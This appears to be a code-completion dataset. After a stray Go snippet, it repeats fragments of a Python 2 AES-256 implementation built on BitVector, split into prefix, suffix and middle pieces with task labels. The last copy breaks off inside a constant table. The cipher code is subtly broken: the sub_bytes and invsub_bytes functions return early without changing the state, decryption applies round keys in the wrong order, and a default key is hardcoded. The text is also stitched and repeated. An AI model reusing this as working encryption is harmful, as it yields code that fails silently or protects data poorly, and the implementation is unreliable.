func (dp *FileDataProvider) GenerateLogs() (plog.Logs, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.logs, false
} | random_line_split | |
AES.py | #! /usr/bin/env python
from BitVector import BitVector
RCON = [
0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40,
0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a,
0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a,
0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39,
0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25,
0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a,
0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08,
0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8,
0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6,
0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef,
0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61,
0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc,
0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01,
0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b,
0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e,
0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3,
0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4,
0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94,
0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8,
0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20,
0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d,
0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35,
0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91,
0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f,
0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d,
0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04,
0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c,
0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63,
0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa,
0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd,
0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66,
0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d]
SBOX = [
[0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76],
[0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0],
[0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15],
[0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75],
[0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84],
[0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf],
[0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8],
[0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2],
[0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73],
[0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb],
[0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79],
[0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08],
[0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a],
[0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e],
[0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf],
[0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16]
]
INVSBOX = [
[0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb],
[0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb],
[0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e],
[0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25],
[0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92],
[0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84],
[0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06],
[0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b],
[0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73],
[0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e],
[0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b],
[0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4],
[0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f],
[0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef],
[0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61],
[0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d]
]
plaintxt = "plaintext.txt"
encout = "encrypted.out"
enctxt = "encryptedtext.txt"
dectxt = "decryptedtext.txt"
default_key = "anunexaminedlifeisnotworthliving"
def encrypt(keyschedule):
# place to store state array
rstate = [[0 for i in xrange(0, 4)] for i in xrange(0, 4)]
bvfile = BitVector(filename=plaintxt)
enctxtout = open(enctxt, "w")
fout = open(encout, "wb")
while (bvfile.more_to_read):
bit_block = bvfile.read_bits_from_file(128)
bit_block.pad_from_right(128 - len(bit_block))
# init state array
for i in xrange(0, 4):
for j in xrange(0, 4):
sp = (i * 32) + (j * 8)
rstate[j][i] = bit_block[sp:sp + 8]
add_round_key(rstate, keyschedule[0:4])
for i in xrange(1, 14):
sub_bytes(rstate)
shift_rows(rstate)
mix_cols(rstate)
add_round_key(rstate, keyschedule[i*4:((i+1)*4)])
sub_bytes(rstate)
shift_rows(rstate)
add_round_key(rstate, keyschedule[56:60])
for i in xrange(0, 4):
for j in xrange(0, 4):
enctxtout.write(rstate[i][j].get_hex_string_from_bitvector())
rstate[i][j].write_to_file(fout)
| fout.close()
enctxtout.close()
def sub_word(word, sbox):
newword = ''
for i in xrange(0, 32, 8):
[row, col] = word[i:i+8].divide_into_two()
row = row.int_val()
col = col.int_val()
newword += str(BitVector(intVal=sbox[row][col]))
return BitVector(bitstring=newword)
def sub_bytes(state):
for i in xrange(0, 4):
for j in xrange(0, 4):
[row, col] = state[i][j].divide_into_two()
row = row.int_val()
col = col.int_val()
return BitVector(intVal=SBOX[row][col])
def shift_rows(state):
for i in xrange(1, 4): # to select row
state[i] = state[i][i:4] + state[i][0:i]
def mix_cols(state):
mod = BitVector(bitstring='100011011')
bv2 = BitVector(hexstring='2')
bv3 = BitVector(hexstring='3')
for j in xrange(0, 4): # to select col
s0 = state[0][j]
s1 = state[1][j]
s2 = state[2][j]
s3 = state[3][j]
sp0 = bv2.gf_multiply_modular(s0, mod, 8) ^ bv3.gf_multiply_modular(s1, mod, 8) ^ s2 ^ s3
sp1 = s0 ^ bv2.gf_multiply_modular(s1, mod, 8) ^ bv3.gf_multiply_modular(s2, mod, 8) ^ s3
sp2 = s0 ^ s1 ^ bv2.gf_multiply_modular(s2, mod, 8) ^ bv3.gf_multiply_modular(s3, mod, 8)
sp3 = bv3.gf_multiply_modular(s0, mod, 8) ^ s1 ^ s2 ^ bv2.gf_multiply_modular(s3, mod, 8)
state[0][j] = sp0
state[1][j] = sp1
state[2][j] = sp2
state[3][j] = sp3
def rot_word(word):
return word[8:32] + word[0:8]
def add_round_key(state, word):
for j in xrange(0, 4):
state[0][j] ^= word[j][0:8]
state[1][j] ^= word[j][8:16]
state[2][j] ^= word[j][16:24]
state[3][j] ^= word[j][24:32]
def key_expansion(key):
w = [0 for i in xrange(0, 64)]
for i in xrange(0, 8):
w[i] = BitVector(textstring=key[(i*4):(i*4+4)])
i = 8
while i < 60:
temp = w[i-1]
if (i % 8 == 0):
temp = sub_word((rot_word(temp)) ^ BitVector(intVal=RCON[i//8]), SBOX)
elif (i % 8 == 4):
temp = sub_word(temp, SBOX)
w[i] = w[i-8] ^ temp
i = i + 1
return w
def decrypt(keyschedule):
# place to store state array
rstate = [[0 for i in xrange(0, 4)] for i in xrange(0, 4)]
bvfile = BitVector(filename=encout)
fout = open(dectxt, "w")
while (bvfile.more_to_read):
bit_block = bvfile.read_bits_from_file(128)
bit_block.pad_from_right(128 - len(bit_block))
# init state array
for i in xrange(0, 4):
for j in xrange(0, 4):
sp = (i * 32) + (j * 8)
rstate[j][i] = bit_block[sp:sp + 8]
add_round_key(rstate, keyschedule[56:60])
for i in xrange(1, 14):
invshift_rows(rstate)
invsub_bytes(rstate)
add_round_key(rstate, keyschedule[i*4:((i+1)*4)])
invmix_cols(rstate)
invshift_rows(rstate)
invsub_bytes(rstate)
add_round_key(rstate, keyschedule[0:4])
for i in xrange(0, 4):
for j in xrange(0, 4):
rstate[i][j].write_to_file(fout)
fout.close()
def invsub_bytes(state):
for i in xrange(0, 4):
for j in xrange(0, 4):
[row, col] = state[i][j].divide_into_two()
row = row.int_val()
col = col.int_val()
return BitVector(intVal=INVSBOX[row][col])
def invshift_rows(state):
for i in xrange(1, 4): # to select row
state[i] = state[i][-i:] + state[i][:-i]
def invmix_cols(state):
mod = BitVector(bitstring='100011011')
brw0 = [BitVector(hexstring='0e'),
BitVector(hexstring='0b'),
BitVector(hexstring='0d'),
BitVector(hexstring='09')]
brw1 = [brw0[3]] + brw0[1:4]
brw2 = [brw1[3]] + brw1[1:4]
brw3 = [brw2[3]] + brw2[1:4]
for j in xrange(0, 4): # to select col
s =[state[0][j],
state[1][j],
state[2][j],
state[3][j]]
sp0 = reduce(lambda x, y: x^y, [brw0[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp1 = reduce(lambda x, y: x^y, [brw1[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp2 = reduce(lambda x, y: x^y, [brw2[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp3 = reduce(lambda x, y: x^y, [brw3[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
state[0][j] = sp0
state[1][j] = sp1
state[2][j] = sp2
state[3][j] = sp3
def main():
#key = raw_input("Please enter the key (or empty to use default key):\n")
#if not key:
key = default_key
keyschedule = key_expansion(key)
encrypt(keyschedule)
decrypt(keyschedule)
if __name__ == "__main__":
main() | random_line_split | |
AES.py | #! /usr/bin/env python
from BitVector import BitVector
RCON = [
0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40,
0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a,
0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a,
0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39,
0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25,
0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a,
0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08,
0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8,
0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6,
0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef,
0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61,
0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc,
0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01,
0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b,
0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e,
0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3,
0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4,
0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94,
0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8,
0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20,
0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d,
0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35,
0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91,
0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f,
0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d,
0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04,
0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c,
0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63,
0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa,
0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd,
0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66,
0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d]
SBOX = [
[0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76],
[0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0],
[0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15],
[0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75],
[0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84],
[0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf],
[0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8],
[0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2],
[0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73],
[0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb],
[0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79],
[0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08],
[0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a],
[0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e],
[0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf],
[0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16]
]
INVSBOX = [
[0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb],
[0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb],
[0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e],
[0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25],
[0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92],
[0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84],
[0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06],
[0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b],
[0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73],
[0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e],
[0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b],
[0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4],
[0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f],
[0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef],
[0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61],
[0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d]
]
plaintxt = "plaintext.txt"
encout = "encrypted.out"
enctxt = "encryptedtext.txt"
dectxt = "decryptedtext.txt"
default_key = "anunexaminedlifeisnotworthliving"
def encrypt(keyschedule):
# place to store state array
rstate = [[0 for i in xrange(0, 4)] for i in xrange(0, 4)]
bvfile = BitVector(filename=plaintxt)
enctxtout = open(enctxt, "w")
fout = open(encout, "wb")
while (bvfile.more_to_read):
bit_block = bvfile.read_bits_from_file(128)
bit_block.pad_from_right(128 - len(bit_block))
# init state array
for i in xrange(0, 4):
for j in xrange(0, 4):
sp = (i * 32) + (j * 8)
rstate[j][i] = bit_block[sp:sp + 8]
add_round_key(rstate, keyschedule[0:4])
for i in xrange(1, 14):
sub_bytes(rstate)
shift_rows(rstate)
mix_cols(rstate)
add_round_key(rstate, keyschedule[i*4:((i+1)*4)])
sub_bytes(rstate)
shift_rows(rstate)
add_round_key(rstate, keyschedule[56:60])
for i in xrange(0, 4):
for j in xrange(0, 4):
enctxtout.write(rstate[i][j].get_hex_string_from_bitvector())
rstate[i][j].write_to_file(fout)
fout.close()
enctxtout.close()
def sub_word(word, sbox):
newword = ''
for i in xrange(0, 32, 8):
[row, col] = word[i:i+8].divide_into_two()
row = row.int_val()
col = col.int_val()
newword += str(BitVector(intVal=sbox[row][col]))
return BitVector(bitstring=newword)
def sub_bytes(state):
for i in xrange(0, 4):
for j in xrange(0, 4):
[row, col] = state[i][j].divide_into_two()
row = row.int_val()
col = col.int_val()
return BitVector(intVal=SBOX[row][col])
def shift_rows(state):
|
def mix_cols(state):
mod = BitVector(bitstring='100011011')
bv2 = BitVector(hexstring='2')
bv3 = BitVector(hexstring='3')
for j in xrange(0, 4): # to select col
s0 = state[0][j]
s1 = state[1][j]
s2 = state[2][j]
s3 = state[3][j]
sp0 = bv2.gf_multiply_modular(s0, mod, 8) ^ bv3.gf_multiply_modular(s1, mod, 8) ^ s2 ^ s3
sp1 = s0 ^ bv2.gf_multiply_modular(s1, mod, 8) ^ bv3.gf_multiply_modular(s2, mod, 8) ^ s3
sp2 = s0 ^ s1 ^ bv2.gf_multiply_modular(s2, mod, 8) ^ bv3.gf_multiply_modular(s3, mod, 8)
sp3 = bv3.gf_multiply_modular(s0, mod, 8) ^ s1 ^ s2 ^ bv2.gf_multiply_modular(s3, mod, 8)
state[0][j] = sp0
state[1][j] = sp1
state[2][j] = sp2
state[3][j] = sp3
def rot_word(word):
return word[8:32] + word[0:8]
def add_round_key(state, word):
for j in xrange(0, 4):
state[0][j] ^= word[j][0:8]
state[1][j] ^= word[j][8:16]
state[2][j] ^= word[j][16:24]
state[3][j] ^= word[j][24:32]
def key_expansion(key):
w = [0 for i in xrange(0, 64)]
for i in xrange(0, 8):
w[i] = BitVector(textstring=key[(i*4):(i*4+4)])
i = 8
while i < 60:
temp = w[i-1]
if (i % 8 == 0):
temp = sub_word((rot_word(temp)) ^ BitVector(intVal=RCON[i//8]), SBOX)
elif (i % 8 == 4):
temp = sub_word(temp, SBOX)
w[i] = w[i-8] ^ temp
i = i + 1
return w
def decrypt(keyschedule):
# place to store state array
rstate = [[0 for i in xrange(0, 4)] for i in xrange(0, 4)]
bvfile = BitVector(filename=encout)
fout = open(dectxt, "w")
while (bvfile.more_to_read):
bit_block = bvfile.read_bits_from_file(128)
bit_block.pad_from_right(128 - len(bit_block))
# init state array
for i in xrange(0, 4):
for j in xrange(0, 4):
sp = (i * 32) + (j * 8)
rstate[j][i] = bit_block[sp:sp + 8]
add_round_key(rstate, keyschedule[56:60])
for i in xrange(1, 14):
invshift_rows(rstate)
invsub_bytes(rstate)
add_round_key(rstate, keyschedule[i*4:((i+1)*4)])
invmix_cols(rstate)
invshift_rows(rstate)
invsub_bytes(rstate)
add_round_key(rstate, keyschedule[0:4])
for i in xrange(0, 4):
for j in xrange(0, 4):
rstate[i][j].write_to_file(fout)
fout.close()
def invsub_bytes(state):
for i in xrange(0, 4):
for j in xrange(0, 4):
[row, col] = state[i][j].divide_into_two()
row = row.int_val()
col = col.int_val()
return BitVector(intVal=INVSBOX[row][col])
def invshift_rows(state):
for i in xrange(1, 4): # to select row
state[i] = state[i][-i:] + state[i][:-i]
def invmix_cols(state):
mod = BitVector(bitstring='100011011')
brw0 = [BitVector(hexstring='0e'),
BitVector(hexstring='0b'),
BitVector(hexstring='0d'),
BitVector(hexstring='09')]
brw1 = [brw0[3]] + brw0[1:4]
brw2 = [brw1[3]] + brw1[1:4]
brw3 = [brw2[3]] + brw2[1:4]
for j in xrange(0, 4): # to select col
s =[state[0][j],
state[1][j],
state[2][j],
state[3][j]]
sp0 = reduce(lambda x, y: x^y, [brw0[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp1 = reduce(lambda x, y: x^y, [brw1[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp2 = reduce(lambda x, y: x^y, [brw2[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp3 = reduce(lambda x, y: x^y, [brw3[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
state[0][j] = sp0
state[1][j] = sp1
state[2][j] = sp2
state[3][j] = sp3
def main():
#key = raw_input("Please enter the key (or empty to use default key):\n")
#if not key:
key = default_key
keyschedule = key_expansion(key)
encrypt(keyschedule)
decrypt(keyschedule)
if __name__ == "__main__":
main()
| for i in xrange(1, 4): # to select row
state[i] = state[i][i:4] + state[i][0:i] | identifier_body |
AES.py | #! /usr/bin/env python
from BitVector import BitVector
RCON = [
0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40,
0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a,
0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a,
0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39,
0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25,
0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a,
0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08,
0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8,
0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6,
0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef,
0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61,
0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc,
0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01,
0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b,
0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e,
